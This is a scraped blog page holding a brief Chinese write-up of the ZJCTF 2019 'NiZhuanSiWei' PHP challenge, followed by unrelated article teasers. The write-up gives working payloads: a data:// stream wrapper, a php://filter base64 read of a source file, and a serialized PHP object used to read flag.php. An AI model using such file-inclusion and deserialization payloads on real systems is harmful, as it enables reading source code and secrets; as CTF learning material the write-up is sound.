[ZJCTF 2019]NiZhuanSiWei

news/2024/7/16 8:21:30 标签: android studio, android, ide

虽然有include函数但我们无法直接包含flag因为对file进行了过滤，又看见有反序列化的入口，只是并没有发现可利用的方法，但题目有提示所以尝试将其调出来

php伪协议写入内容

看到file_get_contents函数想到使用data协议，去封装一个流，然后保险起见include使用了filter，data：写入内容为welcome to the zjctf，&加入php伪协议来读取useless.php

payload如下：

?text=data://text/plain,welcome to the zjctf&file=php://filter/convert.base64-encode/resource=useless.php

给file变量在赋值读取flag.php

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

将前面的伪协议去掉，最终的poc是：

/?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

http://www.niftyadmin.cn/n/5212802.html

基于侏儒猫鼬算法优化概率神经网络PNN的分类预测 - 附代码

基于侏儒猫鼬算法优化概率神经网络PNN的分类预测 - 附代码文章目录基于侏儒猫鼬算法优化概率神经网络PNN的分类预测 - 附代码1.PNN网络概述2.变压器故障诊街系统相关背景2.1 模型建立 3.基于侏儒猫鼬优化的PNN网络5.测试结果6.参考文献7.Matlab代码摘要：针对PNN神…

inBuilder低代码平台新特性推荐-第十期

各位知乎的友友们，大家好~ 今天来给大家带来的是inBuilder低代码平台特性推荐系列第十期——查看变更日志场景介绍【销售订单列表】中添加查看变更日志按钮，可以查看列表当前行数据的历史变更记录。运行时效果概念系统中有些关键业务关键数据&am…

基于单片机的肺活量检测系统（论文+源码）

1.系统设计在基于单片机的肺活量检测系统中，在硬件上整个系统通过利用主控制器STC89C52单片机来实现对整个系统进行控制的功能，通过采用LCD1602实现实时液晶显示数据的功能，通过肺活量传感器XGZP6847ADC0832实现监测肺活量的工作&#xff0…

redis基础知识（快速入门）

redis入门概述首先redis是一个基于内存的key-value型数据库。例如 keyvalueid1namesfes 基于内存存储，读写性能高适合存储一些热点数据（热点商品，新闻等），也就是说一些在短时间内有大量用户访问的数据命令…

【python】python进阶知识点

eval函数用法函数参数：字符串 # 计算表达式 print(eval("12*3")) # 把字符串当成python程序运行 print(eval("random.random()")) # 字符串转成列表 print(type(eval("[1,2,3,4]"))) # 字符串转成字典 print(type(eval("{name…

精准人脉引流软件的开发流程与涉及到的技术

一、精准人脉引流软件的开发流程 1. 确定需求：首先，我们需要明确软件的需求，包括目标用户、功能需求、性能需求等。这些需求将直接影响到软件的开发方向和最终效果。 2. 系统设计：根据需求，进行系统设计，…

kafka,RabbitMQ,RocketMQ,他们之间的区别，架构，如何保证消息的不丢失，保证不重复消费，保证消息的有序性

文章目录 Kafka、RabbitMQ、RocketMQ 之间的区别是什么？性能数据可靠性服务可用性功能 RabbitMQ如何保证消息不丢失？Kafka 的架构说一下？Kafka 怎么保证消息是有序的？Kafka 怎么解决重复消费？Kafka 怎么保证消息不丢失…

单片机、ARM、嵌入式开发、Android 底层开发有什么关系？

单片机、ARM、嵌入式开发、Android 底层开发有什么关系？ 从我目前的见识来看： 单片机是个系统（比如：51、AVR、PLC...），其中包含了去除了输入输出之外的运算器、控制器、存储器，我们用程序可以非…

[ZJCTF 2019]NiZhuanSiWei

php伪协议写入内容

相关文章